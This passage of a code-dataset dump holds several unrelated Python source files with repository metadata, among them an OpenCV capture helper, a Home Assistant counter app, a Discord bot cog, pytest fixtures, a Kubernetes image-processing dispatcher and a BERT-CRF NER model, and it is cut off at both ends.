listener.join()\n","repo_name":"tszydlo/emulator","sub_path":"examples/use_cases/use_case_3.py","file_name":"use_case_3.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14602822548","text":"from time import time\n\nimport cv2\n\n\nclass RealtimeCapture:\n def __init__(self, params):\n self.capture = cv2.VideoCapture(params)\n self.video_frame_time = 0\n self.start_time = None\n\n def get_time(self):\n return self.early_fetch_time\n\n def read(self):\n if self.start_time is None:\n self.start_time = time()\n\n process_time = time() - self.start_time\n\n ret, frame = self.capture.read()\n while self.video_frame_time + process_time > self.capture.get(cv2.CAP_PROP_POS_MSEC) / 1000:\n ret, frame = self.capture.read()\n\n self.start_time = time()\n self.video_frame_time = self.capture.get(cv2.CAP_PROP_POS_MSEC) / 1000\n\n return ret, frame\n\n\nif __name__ == \"__main__\":\n rc = RealtimeCapture((\"\",))\n\n start_time = time.time()\n while True:\n r, frame = rc.read()\n current_time = time.time()\n frame_time = rc.get_time()\n\n if r:\n cv2.putText(frame, \"Video Time: \" + str(frame_time), (30, 30), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 0))\n cv2.putText(frame, \"Wall Time: \" + str(current_time - start_time), (30, 55), cv2.FONT_HERSHEY_COMPLEX, 0.5,\n (255, 255, 0))\n cv2.imshow(\"Preview\", frame)\n\n k = cv2.waitKey(1)\n if k == ord(\"q\"):\n break\n","repo_name":"eduze/PersonDetectors","sub_path":"RealtimeCapture.py","file_name":"RealtimeCapture.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"4325914395","text":"#\n# persist_counters App\n\nimport appdaemon.plugins.hass.hassapi as hass\nimport os\nimport datetime\nimport pickle\nimport sqlite3\nfrom contextlib import closing\n\n_counter_filename_ = '/home/homeassistant/.homeassistant/apps/counters.pkl'\n_db_filename_ = '/home/homeassistant/.homeassistant/apps/autolight.db'\n\nclass AutoLight_Global(hass.Hass):\n\tcounter_dict = {}\n\tdecision_log = []\n\tautolight_bd = None\n\n\tdef initialize(self):\n\t\tself.log(\"Hello from AutoLight_Global\")\n\n\t\t# Register hourly callback to save everything\n\t\tself.daily_handle = self.run_hourly(self.hourly_save, start=datetime.time(0, 0, 0))\n\n\t\t# Register callback to save counters on hass stop\n\t\thandle = self.listen_event(self.hass_stopped, event='plugin_stopped')\n\n\t\t# Register callback to load counters on hass start\n\t\t# handle = self.listen_event(self.hass_started, event='plugin_started')\n\n\t\t# Register callback on app terminate\n\t\thandle = self.listen_event(self.hourly_save, event='terminate')\n\n\t\t# Restore counters\n\t\tself.load_counters()\n\n\t\t# Check if DB exists\n\t\tif not os.path.isfile(_db_filename_):\n\t\t\tself.log(\"AutoLight_Global creating new DB\")\n\t\t\ttmpconn = sqlite3.connect(_db_filename_)\n\t\t\twith closing(tmpconn.cursor()) as c:\n\t\t\t\t# ['fake', 4, 10, 'off,off,on,off,off,off,off,on,off,off,off,off,+25.5,33.0', 15, 0]\n\t\t\t\tc.execute('''CREATE TABLE decisions(\n\t\t\t\t\t\t\tentity text,\n\t\t\t\t\t\t\tweekday integer,\n\t\t\t\t\t\t\thour integer,\n\t\t\t\t\t\t\tcontext text,\n\t\t\t\t\t\t\tturned_on_interval integer,\n\t\t\t\t\t\t\tresult integer)''')\n\n\t\t# Test\n\t\t# self.log(\"***Saving test fake data\")\n\t\t# self.book_decision_data('fake1')\n\t\t# self.book_decision_result(15, 0)\n\t\t# self.save_decision_data()\n\n\tdef hourly_save(self, event_name, data, kwargs):\n\t\tself.log(\"****saving\")\n\t\tself.save_counters('dummy arg')\n\t\tself.save_decision_data()\n\n\tdef hass_stopped(self, event_name, data, kwargs):\n\t\tself.save_counters('dummy arg')\n\n\t# def hass_started(self, event_name, data, kwargs):\n\t# \tself.load_counters()\n\n\tdef load_counters(self):\n\t\tself.log(\"Loading persistent counters\")\n\t\tif os.path.isfile(_counter_filename_):\n\t\t\tself.counter_dict = pickle.load(open(_counter_filename_, 'rb'))\n\t\t\t# Set data\n\t\t\tfor counter_name in self.counter_dict.keys():\n\t\t\t\tself.log(\"Restoring counter: %s: %s\" % (counter_name, self.counter_dict[counter_name]))\n\t\t\t\tself.set_state(counter_name, state=str(self.counter_dict[counter_name]))\n\t\t\t\tself.log(\"done\")\n\n\tdef save_counters(self, kwargs):\n\t\tself.log(\"Saving persistent counters\")\n\t\t# Save data\n\t\tpickle.dump(self.counter_dict, open(_counter_filename_, 'wb'))\n\n\tdef increment_counter(self, counter_name):\n\t\tself.log(\"AutoLight_Global incrementing counter %s\" % counter_name)\n\t\t# Increment counter from current state\n\t\tself.call_service(\"counter/increment\", entity_id=counter_name)\n\t\t# Save in counter_dict\n\t\tself.counter_dict[counter_name] = self.get_state(counter_name)\n\n\n\tdef book_decision_result(self, variables_data, turned_on_interval, result):\n\t\tself.log(\"book_decision_result: %s / %d / %d\" % (variables_data, turned_on_interval, result))\n\t\tvariables_data.append(turned_on_interval)\n\t\tvariables_data.append(result)\n\t\tself.decision_log.append(variables_data.copy())\n\n\t\tself.log(\"book_decision_result done 1: %s\" % self.decision_log)\n\t\t# Clear variables_data\n\t\tdel variables_data[:]\n\t\tself.log(\"book_decision_result done 2: %s\" % self.decision_log)\n\n\tdef save_decision_data(self):\n\t\tif len(self.decision_log) > 0:\n\t\t\tself.log(\"Saving decision data: %s\" % self.decision_log)\n\t\t\tself.log(\"DB: %s\" % _db_filename_)\n\t\t\tcon = sqlite3.connect(_db_filename_)\n\t\t\t# Save data\n\t\t\twith con:\n\t\t\t\tcur = con.cursor()\n\t\t\t\tcur.executemany(\"\"\"INSERT INTO decisions VALUES(?,?,?,?,?,?)\"\"\", self.decision_log)\n\t\t\t\t# for d in self.decision_log:\n\t\t\t\t\t# self.log(\"Saving data: %s\" % d)\n\t\t\t\t\t# ['fake', 4, 10, 'off,off,on,off,off,off,off,on,off,off,off,off,+25.5,33.0', 15, 0]\n\t\t\t\t# cur.execute(\"INSERT INTO decisions VALUES(?,?,?,?,?,?)\" % (d[0],d[1],d[2],d[3],d[4],d[5]))\n\t\t\t# pickle.dump(self.decision_log, open(filename, 'wb'))\n\t\t\tprint(\"%s\" % self.decision_log)\n\t\t\t# Clear data\n\t\t\tself.decision_log = []\n\t\telse:\n\t\t\tself.log(\"No decision data to save\")\n","repo_name":"randomstash/hassconfig","sub_path":"apps/autolight_global.py","file_name":"autolight_global.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18568789076","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Fun(commands.Cog):\n\n def __init__(self,client):\n self.client = client\n \n # Events\n @commands.Cog.listener()\n async def on_ready(self):\n print('Fun Bot is online.')\n\n @commands.command(help=\"gives a nice compliment!\")\n async def compliment(self, ctx):\n compliments = [ \"You look great today!\" ,\n \"You have really really nice programming skills.\" ,\n \"You make an excellent human.\",\n \"You’re a true gift to the people in your life.\",\n \"You’re amazing!\",\n \"You have a remarkable sense of humor.\",\n \"You are one of a kind.\",\n \"You inspire me to be a better Bot.\",\n \"Simply knowing you has made me a better Bot.\",\n \"All my Bot friends think you're really cool!\"]\n await ctx.send(random.choice(compliments))\n \n @commands.command(aliases=['8ball'], help=\"gives an 8-ball style answer to any question\")\n async def _8ball(self, ctx, *, question: str):\n responses = ['It is Certain.', \n 'It is decidedly so',\n 'Without a doubt.',\n 'Yes definitely.',\n 'You may rely on it.',\n 'As I see it, yes.',\n 'Most likely.',\n 'Ummm I guess...',\n 'Signs point to yes.',\n 'Reply hazy, try again.',\n 'Ask again later.',\n 'Better not tell you now.',\n 'Cannot predict now.',\n 'Concentrate and ask again.',\n \"Don't count on it.\",\n 'My reply is no.',\n 'My sources say no.',\n 'Outlook not so good.',\n 'Very doubtful.']\n await ctx.send(f'Question: {question}\\nAnswer: {random.choice(responses)}')\n \n @commands.command(help=\"replies with Pong!\")\n async def ping(self, ctx):\n await ctx.send(f'Pong!')\n\n @commands.command(help=\"replies with Polo!\")\n async def marco(self, ctx):\n await ctx.send(f'Polo!')\n\ndef setup(client):\n client.add_cog(Fun(client))","repo_name":"anavsingh99/discord-bot","sub_path":"cogs/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19099009722","text":"from pytest import fixture\n\nimport os\nimport os.path\n\nfrom autobahn.twisted import WebSocketServerFactory\n\nfrom mudmaker import Exit, Game, Room, Zone, WebSocketConnection, Object\nfrom mudmaker.socials import factory\n\n\n@fixture(name='exit')\ndef get_exit(game, zone):\n \"\"\"Get a new exit linking two rooms.\"\"\"\n location = game.make_object(\n 'Room', (Room,), name='Test Location', zone=zone\n )\n destination = game.make_object(\n 'Room', (Room,), name='Test Destination', zone=zone\n )\n return game.make_object(\n 'Exit', (Exit,), location=location, destination=destination,\n name='Test Exit', direction_name='n'\n )\n\n\n@fixture(name='game')\ndef get_game():\n \"\"\"Get a Game instance.\"\"\"\n g = Game('Test Game')\n g.account_store.filename = 'test-accounts.json'\n yield g\n if os.path.isfile(g.account_store.filename):\n os.remove(g.account_store.filename)\n\n\n@fixture(name='room')\ndef get_room(game, zone):\n return game.make_object('Room', (Room,), name='Test Room', zone=zone)\n\n\n@fixture(name='zone')\ndef get_zone(game):\n return game.make_object('Zone', (Zone,), name='Test Zone')\n\n\nclass PretendPeer:\n host = 'test.example.com'\n port = 1234\n\n\nclass PretendReason:\n def getErrorMessage(self):\n return 'Test conection was disconnected.'\n\n\nclass PretendTransport:\n def setTcpNoDelay(self, value):\n pass\n\n def getPeer(self):\n return PretendPeer()\n\n\nclass PretendConnection(WebSocketConnection):\n \"\"\"A pretend connection.\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.transport = PretendTransport()\n super().__init__(*args, **kwargs)\n self.messages = []\n\n @property\n def last_message(self):\n if self.messages:\n return self.messages[-1]\n return ''\n\n def send(self, *args, **kwargs):\n pass\n\n def message(self, string):\n self.messages.append(string)\n return super().message(string)\n\n\n@fixture(name='connection')\ndef get_connection(game):\n \"\"\"Provides a pretend conection object.\"\"\"\n game.websocket_factory = WebSocketServerFactory()\n game.websocket_factory.game = game\n con = PretendConnection()\n con.factory = game.websocket_factory\n con.onOpen()\n game.connections.append(con)\n yield con\n game.connections.remove(con)\n\n\n@fixture(name='obj')\ndef get_object(game):\n return game.make_object('Object', (Object,), name='Test Object')\n\n\n@fixture(name='accounts')\ndef get_accounts(game):\n \"\"\"Get an AccountStore instance.\"\"\"\n return game.account_store\n\n\n@fixture(name='yaml_filename', scope='session', autouse=True)\ndef get_filename():\n # Will be executed before the first test\n filename = 'test.yaml'\n yield filename\n if os.path.isfile(filename):\n os.remove(filename)\n\n\n@fixture(name='player')\ndef get_player(connection, game, accounts, obj):\n accounts.add_account('test', 'test', obj)\n game.finish_login(connection, obj)\n return obj\n\n\n@fixture(name='socials')\ndef get_socials():\n return factory\n","repo_name":"chrisnorman7/mudmaker","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"71161650436","text":"# Run: pip install tabulate\n\nimport sys # Access command line arguments\nimport csv\nfrom tabulate import tabulate # prints a pretty ASCII format table\n\ndef main():\n check_command_line_args()\n # Read the CSV file and display the table\n display_csv_as_table(sys.argv[1])\n # # Check if the file exists\n try:\n file = open(sys.argv[1], \"r\") # open the file and read it\n pass\n # File doesnt exist\n except FileNotFoundError:\n sys.exit(\"File does not exist\")\n\ndef display_csv_as_table(file_path):\n with open(file_path, \"r\") as file:\n reader = csv.reader(file)\n table = list(reader)\n headers = table[0]\n print(tabulate(table[1:], headers, tablefmt=\"grid\"))\n\ndef check_command_line_args():\n # Check the number of elements given on the command line\n if len(sys.argv) < 2:\n sys.exit(\"Too few command-line arguments\")\n if len(sys.argv) > 2:\n sys.exit(\"Too many command-line arguments\")\n # Check if the file has a .csv extension\n if not sys.argv[1].endswith(\".csv\"):\n sys.exit(\"Not a CSV file\")\n\n\nif __name__ == \"__main__\":\n main()\n\n\n\n# Download pizza menu files via:\n# wget https://cs50.harvard.edu/python/2022/psets/6/pizza/sicilian.csv\n# wget https://cs50.harvard.edu/python/2022/psets/6/pizza/regular.csv\n\n# Run program as:\n# python pizza.py sicillian.csv / regular.csv","repo_name":"Stevecmd/CS50_python_2023","sub_path":"week06/pizza/pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":1370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21020734834","text":"###############################################################################\r\n# #\r\n# This program is free software: you can redistribute it and/or modify #\r\n# it under the terms of the GNU General Public License as published by #\r\n# the Free Software Foundation, either version 3 of the License, or #\r\n# (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program. If not, see . #\r\n# #\r\n###############################################################################\r\n\r\n__author__ = 'Donovan Parks'\r\n__copyright__ = 'Copyright 2015'\r\n__credits__ = ['Donovan Parks']\r\n__license__ = 'GPL3'\r\n__maintainer__ = 'Donovan Parks'\r\n__email__ = 'donovan.parks@gmail.com'\r\n\r\nimport hashlib\r\n\r\n\r\ndef sha256(input_file):\r\n \"\"\"Determine SHA256 hash for file.\r\n\r\n Parameters\r\n ----------\r\n input_file : str\r\n Name of file.\r\n\r\n Returns\r\n -------\r\n str\r\n SHA256 hash.\r\n \"\"\"\r\n\r\n BLOCKSIZE = 65536\r\n hasher = hashlib.sha1()\r\n with open(input_file, 'rb') as afile:\r\n buf = afile.read(BLOCKSIZE)\r\n while len(buf) > 0:\r\n hasher.update(buf)\r\n buf = afile.read(BLOCKSIZE)\r\n\r\n return hasher.hexdigest()\r\n","repo_name":"jtamames/SqueezeMeta","sub_path":"lib/biolib/checksum.py","file_name":"checksum.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":295,"dataset":"github-code","pt":"61"} +{"seq_id":"7858239478","text":"from __future__ import print_function\n\nimport os\nimport uuid\nfrom multiprocessing import Process\nimport time\nfrom bluelens_spawning_pool import spawning_pool\nfrom stylelens_product.products import Products\nfrom stylelens_product.crawls import Crawls\nimport redis\nimport pickle\n\nfrom bluelens_log import Logging\n\nREDIS_SERVER = os.environ['REDIS_SERVER']\nREDIS_PASSWORD = os.environ['REDIS_PASSWORD']\nRELEASE_MODE = os.environ['RELEASE_MODE']\nDB_PRODUCT_HOST = os.environ['DB_PRODUCT_HOST']\nDB_PRODUCT_PORT = os.environ['DB_PRODUCT_PORT']\nDB_PRODUCT_USER = os.environ['DB_PRODUCT_USER']\nDB_PRODUCT_PASSWORD = os.environ['DB_PRODUCT_PASSWORD']\nDB_PRODUCT_NAME = os.environ['DB_PRODUCT_NAME']\nAWS_ACCESS_KEY = os.environ['AWS_ACCESS_KEY'].replace('\"', '')\nAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY'].replace('\"', '')\n\nMAX_PROCESS_NUM = int(os.environ['MAX_PROCESS_NUM'])\n\nREDIS_HOST_CLASSIFY_QUEUE = 'bl:host:classify:queue'\nREDIS_PRODUCT_IMAGE_PROCESS_QUEUE = 'bl:product:image:process:queue'\nREDIS_CRAWL_VERSION = 'bl:crawl:version'\nREDIS_CRAWL_VERSION_LATEST = 'latest'\n\nSPAWNING_CRITERIA = 50\nPROCESSING_TERM = 60\n\noptions = {\n 'REDIS_SERVER': REDIS_SERVER,\n 'REDIS_PASSWORD': REDIS_PASSWORD\n}\nlog = Logging(options, tag='bl-image-process')\nrconn = redis.StrictRedis(REDIS_SERVER, port=6379, password=REDIS_PASSWORD)\n\ndef get_latest_crawl_version(rconn):\n value = rconn.hget(REDIS_CRAWL_VERSION, REDIS_CRAWL_VERSION_LATEST)\n if value is None:\n return None\n\n log.debug(value)\n try:\n version_id = value.decode(\"utf-8\")\n except Exception as e:\n log.error(str(e))\n version_id = None\n return version_id\n\ndef cleanup_products(host_code, version_id):\n global product_api\n try:\n res = product_api.delete_products_by_hostcode_and_version_id(host_code, version_id,\n except_version=True)\n log.debug(res)\n except Exception as e:\n log.error(e)\n\ndef clear_product_queue(rconn):\n rconn.delete(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE)\n\ndef push_product_to_queue(product):\n rconn.lpush(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE, pickle.dumps(product))\n\ndef query(host_code, version_id):\n global product_api\n log.info('start query: ' + host_code)\n\n spawn_counter = 0\n\n q_offset = 0\n q_limit = 500\n\n try:\n while True:\n res = product_api.get_products_by_hostcode_and_version_id(host_code, version_id,\n is_processed=False,\n offset=q_offset, limit=q_limit)\n for p in res:\n push_product_to_queue(p)\n\n if len(res) == 0:\n break\n else:\n q_offset = q_offset + q_limit\n\n except Exception as e:\n log.error(str(e) + ':' + host_code)\n\n\ndef spawn(uuid):\n log.debug('RELEASE_MODE:' + RELEASE_MODE)\n\n pool = spawning_pool.SpawningPool()\n\n project_name = 'bl-image-processor-' + uuid\n log.debug('spawn_image-processor: ' + project_name)\n\n pool.setServerUrl(REDIS_SERVER)\n pool.setServerPassword(REDIS_PASSWORD)\n pool.setApiVersion('v1')\n pool.setKind('Pod')\n pool.setMetadataName(project_name)\n pool.setMetadataNamespace(RELEASE_MODE)\n pool.addMetadataLabel('name', project_name)\n pool.addMetadataLabel('group', 'bl-image-processor')\n pool.addMetadataLabel('SPAWN_ID', uuid)\n container = pool.createContainer()\n pool.setContainerName(container, project_name)\n pool.addContainerEnv(container, 'AWS_ACCESS_KEY', AWS_ACCESS_KEY)\n pool.addContainerEnv(container, 'AWS_SECRET_ACCESS_KEY', AWS_SECRET_ACCESS_KEY)\n pool.addContainerEnv(container, 'REDIS_SERVER', REDIS_SERVER)\n pool.addContainerEnv(container, 'REDIS_PASSWORD', REDIS_PASSWORD)\n pool.addContainerEnv(container, 'SPAWN_ID', uuid)\n pool.addContainerEnv(container, 'MAX_PROCESS_NUM', str(MAX_PROCESS_NUM))\n pool.addContainerEnv(container, 'RELEASE_MODE', RELEASE_MODE)\n pool.addContainerEnv(container, 'DB_PRODUCT_HOST', DB_PRODUCT_HOST)\n pool.addContainerEnv(container, 'DB_PRODUCT_PORT', DB_PRODUCT_PORT)\n pool.addContainerEnv(container, 'DB_PRODUCT_USER', DB_PRODUCT_USER)\n pool.addContainerEnv(container, 'DB_PRODUCT_PASSWORD', DB_PRODUCT_PASSWORD)\n pool.addContainerEnv(container, 'DB_PRODUCT_NAME', DB_PRODUCT_NAME)\n pool.setContainerImage(container, 'bluelens/bl-image-processor:' + RELEASE_MODE)\n pool.setContainerImagePullPolicy(container, 'Always')\n pool.addContainer(container)\n pool.setRestartPolicy('Never')\n pool.spawn()\n\ndef dispatch(rconn, version_id):\n global product_api\n\n size = rconn.llen(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE)\n\n if size > 0 and size < MAX_PROCESS_NUM:\n for i in range(10):\n spawn(str(uuid.uuid4()))\n # time.sleep(60*60*2)\n\n if size >= MAX_PROCESS_NUM and size < MAX_PROCESS_NUM * 10:\n for i in range(100):\n spawn(str(uuid.uuid4()))\n # time.sleep(60*60*5)\n\n elif size >= MAX_PROCESS_NUM * 100:\n for i in range(500):\n spawn(str(uuid.uuid4()))\n # time.sleep(60*60*10)\n\ndef clear_dbs(version_id):\n remove_old_products(version_id)\n\n\ndef remove_old_products(version_id):\n global product_api\n\n try:\n res = product_api.delete_old_products(version_id)\n except Exception as e:\n log.error(str(e))\n\ndef remove_prev_pods():\n pool = spawning_pool.SpawningPool()\n pool.setServerUrl(REDIS_SERVER)\n pool.setServerPassword(REDIS_PASSWORD)\n pool.setMetadataNamespace(RELEASE_MODE)\n data = {}\n data['namespace'] = RELEASE_MODE\n data['key'] = 'group'\n data['value'] = 'bl-image-processor'\n pool.delete(data)\n time.sleep(60)\n\ndef prepare_products(rconn, version_id):\n global product_api\n offset = 0\n limit = 200\n\n clear_product_queue(rconn)\n clear_dbs(version_id)\n remove_prev_pods()\n try:\n log.info('prepare_products')\n while True:\n res = product_api.get_products_by_version_id(version_id=version_id,\n is_processed=False,\n offset=offset,\n limit=limit)\n\n log.debug(\"Got \" + str(len(res)) + ' products')\n for product in res:\n push_product_to_queue(product)\n\n if len(res) == 0:\n break\n else:\n offset = offset + limit\n\n except Exception as e:\n log.error(str(e))\n\ndef check_condition_to_start(version_id):\n global product_api\n\n product_api = Products()\n crawl_api = Crawls()\n\n try:\n log.info(\"check_condition_to_start\")\n\n # Check if image processing queue is empty\n queue_size = rconn.llen(REDIS_PRODUCT_IMAGE_PROCESS_QUEUE)\n if queue_size != 0:\n return False\n\n # Check if crawling process is done\n total_crawl_size = crawl_api.get_size_crawls(version_id)\n crawled_size = crawl_api.get_size_crawls(version_id, status='done')\n if total_crawl_size != crawled_size:\n return False\n\n # Check if all images are processed\n total_product_size = product_api.get_size_products(version_id)\n available_product_size = product_api.get_size_products(version_id, is_available=True)\n unavailable_product_size = product_api.get_size_products(version_id, is_available=False)\n # processed_size = product_api.get_size_products(version_id, is_processed=True)\n\n if (available_product_size + unavailable_product_size) == total_product_size:\n return False\n\n\n except Exception as e:\n log.error(str(e))\n\n return True\n\ndef start(rconn):\n while True:\n version_id = get_latest_crawl_version(rconn)\n if version_id is not None:\n log.info(\"check_condition_to_start\")\n ok = check_condition_to_start(version_id)\n log.info(\"check_condition_to_start: \" + str(ok))\n if ok is True:\n prepare_products(rconn, version_id)\n dispatch(rconn, version_id)\n time.sleep(60*10)\n\nif __name__ == '__main__':\n log.info('Start bl-image-process:3')\n try:\n Process(target=start, args=(rconn,)).start()\n except Exception as e:\n log.error(str(e))\n","repo_name":"BlueLens/bl-image-process","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32758361533","text":"import string\nfrom enigma.utils import Letter, Pair\n\n\ndef test_letter_from_str():\n tests = []\n for i in range(26):\n character = string.ascii_lowercase[i]\n index = i\n tests.append({\"letter\": character, \"index\": index})\n\n for test in tests:\n letter = Letter(test[\"letter\"])\n assert letter.letter == test[\"letter\"] and letter.index == test[\"index\"]\n\n\ndef test_letter_from_index():\n tests = []\n for i in range(26):\n character = string.ascii_lowercase[i]\n index = i\n tests.append({\"letter\": character, \"index\": index})\n\n for test in tests:\n letter = Letter(test[\"index\"])\n assert letter.letter == test[\"letter\"] and letter.index == test[\"index\"]\n\n\ndef test_pairs():\n tests = [\n {\"pair\": {\"A\": \"x\", \"B\": \"c\"}, \"off\": \"t\"},\n {\"pair\": {\"A\": \"r\", \"B\": \"t\"}, \"off\": \"g\"},\n {\"pair\": {\"A\": \"r\", \"B\": \"t\"}, \"off\": \"l\"},\n ]\n\n for test in tests:\n p = test[\"pair\"]\n pair = Pair(p[\"A\"], p[\"B\"])\n\n a = Letter(p[\"A\"])\n b = Letter(p[\"B\"])\n off = Letter(test[\"off\"])\n\n assert(pair.get(a) == b and pair.get(b) == a and pair.get(off) == None)\n","repo_name":"raymas/enigma-cipher-machine","sub_path":"tests/utils_tests.py","file_name":"utils_tests.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22584297334","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom bert import modeling\nimport tokenization_ner\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import crf\nfrom tensorflow.contrib.layers.python.layers import initializers\n\nDTYPE = tf.float32\nDTYPE_INT = tf.int32\n\n\nclass charBERT(object):\n def __init__(self,\n bert_config, char_config,\n is_training, # is_evaluation,\n input_token_ids, input_char_ids,\n labels, num_labels, use_char_representation=True,\n input_mask=None, segment_ids=None,\n use_one_hot_embeddings=False, # TPU加速则为True\n scope=None):\n \"\"\"\n\n :param bert_config:\n :param char_config:\n :param is_training: 处于estimator模式下的train模式\n :param is_evaluation: 处于estimator模式下的evaluate模式\n :param input_token_ids:\n :param input_char_ids:\n :param labels: 真实标签\n :param num_labels: 标签个数,用于CRF的转移矩阵\n :param input_mask:\n :param segment_ids: 用于Bert,不过这里没啥用处,因为只是处理一个ner的问题,所以bert默认都为0\n :param use_one_hot_embeddings: 是否用tpu\n :param scope:\n \"\"\"\n self.bert_model = modeling.BertModel(config=bert_config,\n is_training=is_training,\n input_ids=input_token_ids,\n input_mask=input_mask,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_one_hot_embeddings)\n self.token_output = self.bert_model.get_sequence_output()\n\n if use_char_representation:\n char_embed_dim = char_config['char_embed_dim']\n filters = char_config['filters']\n alphabet_size = char_config['alphabet_size']\n activations = char_config['activations']\n n_highway = char_config['n_highway']\n projection_dim = char_config['projection_dim']\n char_dropout_rate = char_config['char_dropout_rate'] if is_training else 1.0\n\n self.charcnn_model = CharRepresentation(char_input=input_char_ids,\n alphabet_size=alphabet_size,\n filters=filters,\n projection_dim=projection_dim,\n char_embed_dim=char_embed_dim,\n activations=activations,\n n_highway=n_highway,\n dropout_rate=char_dropout_rate\n )\n self.char_output = self.charcnn_model.get_highway_output()\n\n token_shape = modeling.get_shape_list(self.token_output, expected_rank=3)\n char_shape = modeling.get_shape_list(self.char_output, expected_rank=3)\n\n if token_shape[1] != char_shape[1]:\n raise ValueError(\n \"The time steps of token representation (%d) is not the same as char representation (%d) \"\n % (token_shape[1], char_shape[1]))\n\n self.final_output = tf.concat([self.token_output, self.char_output], axis=-1)\n else:\n tf.logging.info(\"****************BERT representation only***************\")\n self.final_output = self.token_output\n\n sequece_lengths = tf.reduce_sum(input_mask, axis=-1)\n self.crf = CRF(input=self.final_output,\n labels=labels,\n num_labels=num_labels,\n lengths=sequece_lengths,\n is_training=is_training,\n # is_evaluation=is_evaluation # estimator模式下的evaluate模式还是需要返回损失函数的\n )\n\n def get_crf_loss(self):\n return self.crf.crf_loss()\n\n def get_orig_loss(self):\n return self.crf.orig_loss()\n\n def get_crf_preds(self):\n return self.crf.get_crf_decode_tags()\n\n def get_orig_preds(self):\n return self.crf.get_orig_tags()\n\n\nclass CRF(object):\n def __init__(self, input, labels, num_labels,\n lengths, is_training, dropout_rate=0.7):\n \"\"\"\n\n :param input:\n :param labels:\n :param num_labels: label的种类数,因为CRF是状态转移,因此label为一个状态\n :param lengths: batch中每个句子的实际长度\n :param is_training:\n :param dropout_rate:\n \"\"\"\n self.labels = labels\n self.num_labels = num_labels\n\n if is_training:\n input = tf.nn.dropout(input, dropout_rate)\n # project\n self.logits = self._project_layer(input, num_labels)\n if is_training:\n self.logits = tf.nn.dropout(self.logits, dropout_rate)\n # crf\n self.log_likelihood, self.trans = self._crf_log_likelihood(self.labels, self.logits, lengths, num_labels)\n # CRF decode, pred_ids 是一条最大概率的标注路径\n self.pred_ids, _ = crf.crf_decode(potentials=self.logits, transition_params=self.trans, sequence_length=lengths)\n\n def _project_layer(self, input, num_labels, name=None):\n \"\"\"\n :param outputs: [batch_size, num_steps, emb_size]\n :return: [batch_size, num_steps, num_tags]\n \"\"\"\n hidden_state = input.get_shape()[-1]\n seq_length = input.get_shape()[-2]\n with tf.variable_scope(\"project\" if not name else name):\n # project to score of tags\n with tf.variable_scope(\"logits\"):\n W = tf.get_variable(\"W\", shape=[hidden_state, num_labels],\n dtype=tf.float32, initializer=initializers.xavier_initializer())\n\n b = tf.get_variable(\"b\", shape=[num_labels], dtype=tf.float32,\n initializer=tf.zeros_initializer())\n\n hidden_ouput = tf.reshape(input,[-1, hidden_state])\n pred = tf.nn.xw_plus_b(hidden_ouput, W, b)\n return tf.reshape(pred, [-1, seq_length, num_labels])\n\n def _crf_log_likelihood(self, labels, logits, lengths, num_labels):\n \"\"\"\n calculate crf loss\n :param project_logits: [1, num_steps, num_tags]\n :return: scalar loss\n \"\"\"\n with tf.variable_scope(\"crf_loss\"):\n trans = tf.get_variable(\n \"transitions\",\n shape=[num_labels, num_labels],\n initializer=initializers.xavier_initializer())\n log_likelihood, trans = tf.contrib.crf.crf_log_likelihood(\n inputs=logits,\n tag_indices=labels,\n transition_params=trans,\n sequence_lengths=lengths)\n # return tf.reduce_mean(-log_likelihood), trans\n return log_likelihood, trans\n\n def crf_loss(self):\n return tf.reduce_mean(-self.log_likelihood)\n\n def orig_loss(self):\n self.labels = tf.one_hot(indices = self.labels, depth = self.num_labels)\n self.loss_per_loc = tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.labels,\n logits=self.logits,\n dim=-1)\n return tf.reduce_mean(tf.reduce_sum(self.loss_per_loc, axis=-1), # 每个example的每个位置tag的损失,再加起来\n axis=-1)\n\n def get_crf_decode_tags(self):\n return self.pred_ids\n\n def get_orig_tags(self):\n return tf.argmax(self.logits, axis=-1)\n\n\nclass CharRepresentation(object):\n def __init__(self, char_input, alphabet_size, filters,\n char_embed_dim, projection_dim, activations='tanh',\n n_highway=None, dropout_rate=0.7):\n\n char_length = char_input.get_shape().as_list()[2]\n sequence_length = char_input.get_shape().as_list()[1]\n batch_size = char_input.get_shape().as_list()[0]\n\n with tf.name_scope(\"Char_Embedding\"), 